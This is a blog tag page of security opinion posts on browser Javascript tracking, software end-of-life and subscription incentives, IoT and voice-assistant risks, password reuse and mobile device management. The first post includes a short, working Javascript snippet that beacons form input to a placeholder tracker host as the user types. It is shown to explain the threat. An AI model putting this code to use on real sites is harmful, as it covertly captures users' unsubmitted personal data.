Showing all posts tagged security:

The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine, should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing the browser processes so that Javascript cannot escape the browser itself, and later, the individual web page that it came from. However, this only dealt with the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say: who cares, you only update apps over wifi. But do you only browse on wifi? 14 MB for a few hundred words adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaffling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.
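This is not hard to do. Here is a minimal sketch of the technique - the collection endpoint is invented for illustration, and real trackers are considerably more sophisticated:

```javascript
// Hypothetical sketch: exfiltrate form input as it is typed - no submit
// required. The tracker.example endpoint is invented for illustration.
function payloadFor(field) {
  // Snapshot the field's name and whatever is in it right now
  return JSON.stringify({ name: field.name, value: field.value });
}

// Browser-only wiring: fire a beacon on every keystroke or auto-fill.
if (typeof document !== 'undefined') {
  document.querySelectorAll('input, textarea').forEach((field) => {
    field.addEventListener('input', () => {
      // sendBeacon still delivers even if the user closes the page moments later
      navigator.sendBeacon('https://tracker.example/collect', payloadFor(field));
    });
  });
}
```

A dozen lines, and every half-typed thought leaves your machine before you ever hit Submit.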

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

Incentives Drive Behaviour - Security Is No Exception

Why is security so hard?

Since I no longer work in security, I don’t have to worry about looking like an ambulance-chasing sales person, and I can opine freely about the state of the world.

The main problem with security is the intersection of complexity and openness. In the early days of computers there was a philosophical debate about the appropriate level of security to include in system design. The apex of openness was probably MIT’s Incompatible Time-Sharing System, which did not even oblige users to log on - although it was considered polite to do so.

I will just pause here to imagine that ethos of openness in the context of today’s social media, where the situation is so bad that Twitter felt obliged to change its default user icon because the “egg” had become synonymous with bad behaviour online.

By definition, security and openness are always in opposition. Gene "Spaf" Spafford, who knows a thing or two about security, famously opined that:

The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts.

Obviously, such a highly-secure system is not very usable, so people come up with various compromises based on their personal trade-off between security and usability. The problem is that this attempt to mediate between two opposite impulses adds complexity to the system, which brings its own security vulnerabilities.

Ultimately, IT security is a constant Red Queen’s Race, with operators of IT systems rushing to patch the latest flaws, knowing all the while that more flaws are lurking behind those, or being introduced with new functionality.

Every so often, the maintainers of a system will just throw up their hands, declare it officially unmaintainable, and move on to something else. This process is called "End of Life", and is supposed to coincide with users also moving to a new, supported platform.

Unfortunately this mass upgrade does not always take place. Many will cite compatibility as a justification, and certainly any IT technician worth their salt knows better than to mess with a running system without a good reason. More often, though, the reason is cost. In a spreadsheet used to calculate the return on different proposed investments, “security” falls under the heading of “risk avoidance”: a nebulous future event that may become less probable if the investment is made.

For those who have not dealt with many finance people: as a rule, they hate this sort of thing. Unless you have good figures for both the probability of the future event and its impact, they will be very unhappy with any investment proposed on that basis.

The result is that old software sticks around long after it should have been retired.

As recently as November 2015, it emerged that Paris’ Orly airport was still operating on Windows 3.1 - an operating system that has not been supported since 2001.

The US military still uses 8" floppy disks for its ICBMs:

"This system remains in use because, in short, it still works," Pentagon spokeswoman Lt Col Valerie Henderson told the AFP news agency.

And of course we are still dealing with the fallout from the recent WannaCry ransomware worm, targeting Windows XP - an operating system that has not been supported since 2014. Despite that, it is still the fourth most popular version of Windows (behind Windows 7, Windows 10, and Windows 8.1), with 5.26% share.

Get to the Point!

It’s easy to mock people still using Windows XP, and to say that they got no more than they deserved - but look at that quote from the Pentagon again:

"This system remains in use because, in short, it still works"

Windows XP still works fine for its users. It is still fit for purpose. The IT industry has failed to give those people a meaningful reason to upgrade - and so many don’t, or wait until they buy new hardware and accept whatever comes with the new machine.

Those upgrades do not come nearly as frequently as they used to, though. In the late Nineties and early Oughts, I upgraded my PC every eighteen months or so (as funds permitted), because every upgrade brought huge, meaningful differences. Windows 95 really was a big step up from Windows 3.1. On the Mac side, System 7 really was much better than System 6. Moving from a 486 to a Pentium, or from 68k to PowerPC, was a massive leap. Adding a 3dfx card to your system made an enormous difference.

Conversely, a three-year-old computer was an unusable pile of junk. Nerds like me installed Linux on those old machines and ran them side by side with our main computers, but most people had no interest in doing such things.

These days, that’s no longer the case. For everyday web browsing, light email, and word processing, a decade-old computer might well still cut it.

That’s not even to mention institutional use of XP; Britain’s NHS, for instance, was hit quite hard by WannaCry due to their use of Windows XP. For large organisations like the NHS, the direct financial cost of upgrading to a newer version of Windows is a relatively small portion of the overall cost of performing the upgrades, ensuring compatibility of all the required software, and retraining literally hundreds of thousands of staff.

So, users have weak incentives to upgrade to new, presumably more secure, versions of software; got it. Should vendors then be obliged to ship them security patches in perpetuity?

Zeynep Tufekci has argued as much in a piece for the New York Times:

First, companies like Microsoft should discard the idea that they can abandon people using older software. The money they made from these customers hasn’t expired; neither has their responsibility to fix defects.

Unfortunately, it’s not that simple, as Steven Bellovin explains:

There are two costs, a development cost $d and an annual support cost $s for n years after the "warranty" period. Obviously, the company pays $d and recoups it by charging for the product. Who should pay $n·s?

The trouble is that n can be large; the support costs could thus be unbounded.

Can we bound n? Two things are very clear. First, in complex software no one will ever find the last bug. As Fred Brooks noted many years ago, in a complex program patches introduce their own, new bugs. Second, achieving a significant improvement in a product's security generally requires a new architecture and a lot of changed code. It's not a patch, it's a new release. In other words, the most secure current version of Windows XP is better known as Windows 10. You cannot patch your way to security.
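Spelled out (with R standing for the one-off licence revenue - my label, not Bellovin's), the vendor's lifetime result on the product is:

```latex
\text{profit} = R - d - n \cdot s
```

R is fixed at the moment of sale, while the support term n·s grows without bound as n does; sooner or later the product is guaranteed to end up under water, which is exactly why vendors insist on capping n with an End of Life date.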

Incentives matter, on the vendor side as well as on the user side. Microsoft is not incentivised to do further work on Windows XP, because it has already gathered all the revenue it is ever going to get from that product. From a narrowly financial perspective, Microsoft would prefer that everyone purchase a new license for Windows 10, either standalone or bundled with the purchase of new hardware, and migrate to that platform.

Note that, as Steven Bellovin points out above, this is not just price-gouging; there are legitimate technical reasons to want users to move to the latest version of your product. However, financial incentives do matter, a lot.

This is why if you care about security, you should prefer services that come with a subscription.

If you’re not Paying, you’re the Product

Subscription licensing means that users pay a recurring fee, and in return, vendors provide regular updates, including both new features and fixes such as security patches.

As usual, Ben Thompson has a good primer on the difference between one-off and subscription pricing. His point is that subscriptions are better for both users and vendors because they align incentives correctly.

From a vendor’s perspective, one-off purchases give a hit of revenue up front, but do not really incentivise long-term engagement. It is true that in the professional and enterprise software world, there is also an ongoing maintenance charge, typically on the order of 18-20% per year. However, that is generally accounted for differently from sales revenue, and so does not drive behaviour to nearly the same extent. In this model, individual sales people have to behave like sharks, always in motion, always looking for new customers. Support for existing customers is a much lower priority.

Conversely, with a subscription there is a strong incentive for vendors to persuade customers to renew their subscription - including by continuing to provide new features and patches. Subscription renewal rates are scrutinised carefully by management (and investors), as any failure to renew may well be symptomatic of problems.

Users are also incentivised to take advantage of the new features, since they have already paid for them. When upgrades are freely available, they are far more likely to be adopted - compare the adoption rate for new MacOS or iOS versions to the rate for Windows (where upgrades cost money) or Android (where upgrades might not be available, short of purchasing new hardware).

This is why Gartner expects that by 2020, more than 80 percent of software vendors will change their business model from traditional license and maintenance to subscription.

At Work - and at Home, Too

One final point: this is not just an abstract discussion for multi-million-euro enterprise license agreements. The exact same incentives apply at home.

A few years ago, I bought a cordless phone that also communicated with Skype. From the phone handset, I could make or answer either a POTS call, or a Skype voice call. This was great - for a while. Unfortunately the hardware vendor never upgraded the phone’s drivers for a new operating system version, which I had upgraded to for various reasons, including improved security.

For a while I soldiered on, using various hacks to keep my Skype phone working, but when the rechargeable batteries died, I threw the whole thing in the recycling bin and got a new, simpler cordless phone that did not depend on complicated software support.

A cordless phone is simple and inexpensive to replace. Imagine that had been my entire Home of the Future IoT setup, with doorbells, locks, alarms, thermostats, fridges, ovens, and who knows what else. “Sorry, your home is no longer supported.”1

With a subscription, there is a reasonable expectation that vendors will continue to provide support for the reasonable lifetime of their products (and if they don’t, there is a contract with the force of law behind it).

Whether it’s for your home or your business, if you rely on it, make sure that you pay for a subscription, so that you can be assured of support from the vendor.


  1. Smart home support: “Have you tried closing all the windows and then reopening them one by one?”

Talk Softly

With the advent of always-on devices that are equipped with sensitive microphones and a permanent connection to the Internet, new security concerns are emerging.

Virtual assistants like Apple’s Siri, Microsoft’s Cortana and Google Now have the potential to make enterprise workers more productive. But do “always listening” assistants pose a serious threat to security and privacy, too?

Betteridge’s Law is in effect here. Sure enough, the second paragraph of the article discloses its sources:

Nineteen percent of organizations are already using intelligent digital assistants, such as Siri and Cortana, for work-related tasks, according to Spiceworks’ October 2016 survey of 566 IT professionals in North America, Europe, the Middle East and Africa.

A whole 566 respondents, you say? From a survey run by a help desk software company? One suspects that the article is over-reaching a bit - and indeed, if we click through to the actual survey, we find this:

Intelligent assistants (e.g., Cortana, Siri, Alexa) used for work-related tasks on company-owned devices had the highest usage rate (19%) of AI technologies

That is a little bit different from what the CSO Online article is claiming. Basically, anyone with a company-issued iPhone who has ever used Siri to create an appointment, set a reminder, or send a message about anything work-related would fall into this category.

Instead, the article leaps from that limited claim to the extrapolation that people will bring their Alexa devices to work and connect them to the corporate network. Leaving aside for a moment the particular vision of hell that is an open-plan office where everyone is talking into the air all the time, what does that mean for the specific recommendations in the article?

  1. Focus on user privacy
  2. Develop a policy
  3. Treat virtual assistant devices like any IoT device
  4. Decide on BYO or company-owned
  5. Plan to protect

These are actually not bad recommendations - but they are so generic as to be useless. Worse, when they do get into specifics, they are almost laughably paranoid:

Assume all devices with a microphone are always listening. Even if the device has a button to turn off the microphone, if it has a power source it’s still possible it could be recording audio.

This is drug-dealer level of paranoia. Worrying that Alexa might be broadcasting your super secret and valuable office conversations does not even make the top ten list of concerns companies should have about introducing such devices into their networks.

The most serious threat you can get from Siri at work is co-workers pranking you if you enable access from the lock screen. In that case, anyone can grab your unattended iPhone and instruct Siri to call you by some ridiculous name. Of course I would never sabotage a colleague’s phone by renaming him “Sweet Cakes”. Ahem. Interestingly, it turns out that the hypothetical renaming also extends to the entry in the Contacts…

The real problem with these misguided recommendations is that they take the focus off advice that would actually be useful in the real world. For instance, if you must have IoT devices in the office for some reason, this is good advice:

One way to segment IoT devices from the corporate network is to connect them to a guest Wi-Fi network, which doesn’t provide access to internal network resources.

This recommendation applies to any device that needs Internet access but does not require access to resources on the internal network. This will avoid issues where, by compromising a device (or its enabling cloud service), intruders are able to access your internal network in what is known as a “traversal attack”. If administrators restrict the device’s access to the network, that will also restrict the amount of damage an intruder can do.

Thinking about access to data is a good idea in general, not just for voice assistants or IoT devices:

Since personal virtual assistants “rely on the cloud to comprehend complex commands, fetch data or assign complex computing tasks to more resources,” their use in the enterprise raises issues about data ownership, data retention, data and IP theft, and data privacy enforcement that CISOs and CIOs will need to address.

Any time companies choose to adopt a service that relies on the cloud, their attack surface is not limited to the device itself, but also extends to that back-end service - which is almost certainly outside their visibility and control. Worse, in a BYOD scenario, users may introduce new devices and services to the corporate network that are not designed or configured for compliance with organisations’ security and privacy rules.

Security is important - but let’s focus on getting the basics right, without getting distracted by overly-specific cybersecurity fantasy role-playing game scenarios involving Jason Bourne hacking your Alexa to steal your secrets.

IoT Future: Saved by Obsolescence?

It’s that most magical time of year… no, not Christmas, that’s all over now until next December. No, I mean CES, the annual Consumer Electronics Show in Las Vegas. Where better than Vegas for a million ridiculous dreams to enjoy brief moments of fame, only to fade soon after?

It used to be that the worst thing that could come out of CES was a drawer full of obsolete gadgets. These days, things can get a bit more serious. Pretty much every gadget on display is now wifi-enabled and internet-connected - yes, even the pillows and hairbrushes.

The reason this proliferation of connectivity is a problem is the "blinking twelves" factor, that I have written about before:

Back in the last century, digital clocks with seven-segment displays became ubiquitous, including as part of other items of home electronics such as VCRs. When first plugged in, these would blink "12:00" until the time was set by the user.

Technically-minded people soon noticed that when they visited less technical friends or relatives, all the appliances in the house would still be showing the “blinking twelves” instead of the correct time. The "blinking twelves" rapidly became short-hand for "civilians" not being able to – or not caring to – keep up with the demands of ubiquitous technology.

The problem that we are facing is that technology has already begun to spread beyond the desktop. Even the most technophobic now carry a phone that is “smart” to a greater or lesser degree, and many people treat these devices much like their old VCRs, installing them once and then forgetting about them. However, all of these devices are running 24/7, connected to the public Internet, with little to no management or updates.

Now we are starting to see the impact of that situation. Earlier this year, one of the biggest botnets in history was created from hacked smart CCTV cameras and took down big chunks of the Internet.

That’s just crude weight-of-numbers stuff, though; the situation will get even more… interesting as people figure out how to use all of the data gathered by those Things - and not just the owners of the devices, either. As people introduce always-on internet-connected microphones into their homes, it’s legitimate for police to wonder what evidence those microphones may have overheard. It is no longer totally paranoid to wonder what the eventual impact will be:

Remember that quaint old phrase "in the privacy of your own home". I wonder how often we will be using it in 20 years' time.

What can we do?

Previous scares have shown that there is little point in the digerati getting all excited about these sorts of things. People have enough going on with their lives; it takes laws to force drivers to take care of basic maintenance of their cars, and we are talking about multi-tonne hunks of metal capable of speeds in excess of 100mph. Forget about getting them to update firmware on every single device in their home, several times a year.

Calls for legislation of IoT are in my opinion misguided; previous attempts to apply static legal frameworks to the dynamic environment of the Internet have tended to be ineffective at best, and to backfire at worst.

Ultimately, what will save us is that same blinking twelves nature of consumers. Consider the situation right now in San Francisco, where the local public transport system’s display units, which should show the time until the next bus or train, are giving wildly inaccurate times:

To blame is a glitch that's rendered as many as 40 percent of buses and Muni vehicles "invisible" to the NextMuni system: A bus or light rail train could arrive far sooner than indicated, but the problem, which emerged this week, is not expected to be resolved for several weeks.

Muni management have explained the problem:

NextMuni data is transmitted via AT&T’s wireless cell phone network. As Muni was the first transit agency to adopt the system, the NextMuni infrastructure installed in 2002 only had the capacity to use a 2G wireless network – a now outdated technology which AT&T is deactivating nationwide.

What took down NextMuni - the obsolescence of the 2G network that it relied on - will also be the fix for all the obsolete and insecure IoT devices out there, next time there is a major upgrade in wifi standards. More expert users may proactively upgrade their wifi access points to get better speed and range, but that will not catch most of the blinking twelves people. However, it’s probably safe to assume that most of the Muggles are relying on devices from their internet provider, and when their provider sends them a new device or they change provider, hey presto - all the insecure Things get disconnected from their botnets.

Problem solved?


Image by Arto Marttinen via Unsplash

Security AND Usability

Sure, blame the user

Because there isn’t enough recent security news, everyone is all worked up about the 2012 LinkedIn breach. Okay, it’s somewhat newsworthy because some lowlife is now trying to sell the data. All the security vendors have jumped on the bandwagon1, but in particular lots of people are mocking the fact that people are using common or easily-guessed passwords:

  • 123456

  • linkedin

  • password

  • 123456789

  • 12345678

Now a bot has emerged which attempts to reuse known leaked passwords to log in to sensitive sites such as online banking systems. Predictably, the main response has been mockery, with El Reg opining that "If your Netflix password is your banking password, you'll get what you deserve".

This sort of victim-blaming has got to stop. It may be fun in an elitist, look-at-the-lusers sort of way, but it’s not actually advancing the cause of better security.

Obviously the real villains of the piece are the people exploiting those credentials, but those sorts of people are probably going to be with us until the ultimate heat death of the Universe, so blaming them is not a particularly productive exercise. Law enforcement could and should do more to bring the perps to justice, but that can only ever happen after the fact, when it’s too late for the victims.

Among people we can actually expect to influence, I would start with the banks. Given that people are out there trying to break into banking systems, because that's where the money is, and given the potential consequences of a breach, the design of those systems must include more advanced security than a simple username and password pair.

For reasons too complicated and boring to relate, I actually have two bank accounts with different institutions in different countries. Both, however, implement two-factor authentication. One has a challenge-response device that works with my ATM card, while the other requires me to make a call from my registered phone number and enter a one-time code. Any bank not implementing something along those lines in 2016 is negligent with their customers’ security. If your bank does not offer two-factor authentication, you should run, not walk, to the exits.

But what about the (l)users?

Users certainly bear some responsibility for not sharing passwords - but in the real world, there are already far too many services that require me to create an account with a username and a password for no good reason. Log in to comment, log in to review, log in to purchase, log in to make a reservation… No wonder people share passwords between services!

It’s fine to sit in the ivory tower of security policy and blame people for doing this sort of thing, but it’s the reality. At least nowadays most places accept an email address as the user account, so that’s one thing less to remember - without worrying about whether this particular site right here wanted a username of less than eight characters, exactly eight characters, or more than eight characters, or whether somebody had already picked my chosen user name so I made a variant, or whatever.

Passwords themselves are still a problem, though. Logging in via Google, Facebook or Twitter is becoming more common, but there the issue is that I don’t necessarily want to share my social ID with every random website that I need to have a one-time interaction with.

The result is that I reuse passwords for unimportant services all the time. However, all the important ones are unique - including my LinkedIn password, since my old one was caught up in that 2012 breach. Security needs to be done in layers. If someone gets my Random Website password, that won’t get them into my LinkedIn - and if they get my (new) LinkedIn creds, that still won’t get them anywhere with my online banking.

And here’s a pro tip - for all those one-time, "log in to use our wifi"-type deals, just do like my good friend Annie Onymous, who is always happy to share her email address: ann.onymous@myo.biz.

Stay safe out there.


  1. Not that there’s anything wrong with that per se; we all take any opportunity to link our wares to current affairs. What I’m objecting to here is the wrong-headed thinking that is exposed in the rush. 

Password to the Ivory Tower

My big focus at work lately is the SecOps gap, the breakdown in communications between IT Security and Operations groups. The problem here is that the infosec group comes up with some policy that is great in theory, but runs into issues when the poor sysadmins try to apply it. Either the policy is too vague, or it is contradictory, or it would break some application that the line of business depends on, or it is simply too cumbersome and time-consuming to implement properly.

At work I talk about this in the context of enterprise IT, but the exact same thing applies in consumer IT. Case in point: there was recently a breach of Starwood's SPG loyalty programme - see Brian Krebs' report. Sure enough, I got an email from SPG entitled "Protect Your Information by Updating Your SPG Password".

SPG should be applauded for being so proactive, and the breach does not seem to be due to any gross negligence on their part. The only thing they might have done differently would be to have more aggressive back-off policies for repeated authentication attempts, but let's not forget that this is a generalist site, and one that is probably not used that frequently by most people. Users may legitimately forget their credentials between one login and the next. No, my problem is with Brian Krebs' advice:

far too many people re-use the same passwords at multiple sites that hold either their credit card information or points that can easily be redeemed for cash.

Well yes, this is true, and I'm as guilty as anyone - but on the other hand, there are simply far too many passwords out there! When every website I visit wants me to create a profile and secure that with a password, of course I'm going to reuse those credentials!

The trick is not to reuse credentials on anything valuable. Don't reuse the credentials for your online banking, for instance - those have to be unique. But for every Tom, Dick and Harry who wants a password? They can all get the same one, and that's if I don't simply introduce myself as Ann Onymous, with this handy email account at mailinator.com.

This is why central login services via Facebook, Twitter or Google are so popular. The problem there is that I don't necessarily want any of that unholy trio tracking my every move, nor do I entirely trust random sites with my OAuth creds. I did like OpenID as a concept, but it's pretty much dead now in practice.

Bottom line

Berating people for poor password security practices won't cut it. We as an industry have to make it easy for people to do the Right Thing, not set up obstacle courses and then point and laugh when people trip over them.


Image by Keith Misner via Unsplash

Security Theatre

There are many things in IT that are received knowledge, things that everyone knows.

One thing that everyone knows is that you have to manage employees' mobile devices to prevent unauthorised access to enterprise systems. My employer's choice of MDM agent is a bit intrusive for my personal tastes, so I opted not to install it on my personal iPad. The iPhone is the company's device, so it's their own choice what they want me to run on it.

Among other things, this agent is required to connect to the company Exchange server from mobile devices. You can't just add an Exchange account and log in with your AD credentials, you need this agent to be in place.

But why the focus on mobile devices?

When I upgraded my work and home Macs to Yosemite, I finally turned on the iCloud Keychain. I hadn't checked exactly what was syncing, and was surprised to see work calendar alerts turning up on my home Mac. My personal Mac had just grabbed my AD credentials out of iCloud and logged in to Exchange, without any challenge from the corporate side.

So how is that different from my iPad? Why is a Mac exempt from the roadblock? A Mac is arguably less secure than an iPad if it gets forgotten in a coffee shop or whatever - never mind a Windows machine. Why is "mobile" different? Just because?

Many enterprise IT people seem to lose their minds when it comes to mobile device management. I'm not arguing for simply dropping the requirement, just for a sane evaluation of the risks and of the responses they require.

Dark Security

Brian Krebs reports a spike in payment card fraud following the now-confirmed Home Depot security breach.

This is actually good news.

Wait, what?

Bear with me. There has always been a concern that many security breaches in the cloud are not being reported or disclosed. The fact that there are no other unexplained spikes in card fraud would tend to indicate that there are no huge breaches that have not been reported, frantic stories about billions of stolen accounts notwithstanding.

The day we should really start to worry is when we see spikes in card fraud that are not related to reported breaches.

I'm published!

A piece I wrote on Heartbleed was published in Cloud Computing Intelligence magazine: Once you’ve dealt with Heartbleed, how do you prevent it recurring?.
Summary and lead-in:

You've got rid of Heartbleed, and you're relaxing with a soothing cup of something strong, but how do you know that it's gone for good? Dominic Wellington looks at creating a containment policy for Heartbleed and for any subsequent nasty bug that will stop them from coming back to plague you again.

Feedback welcome!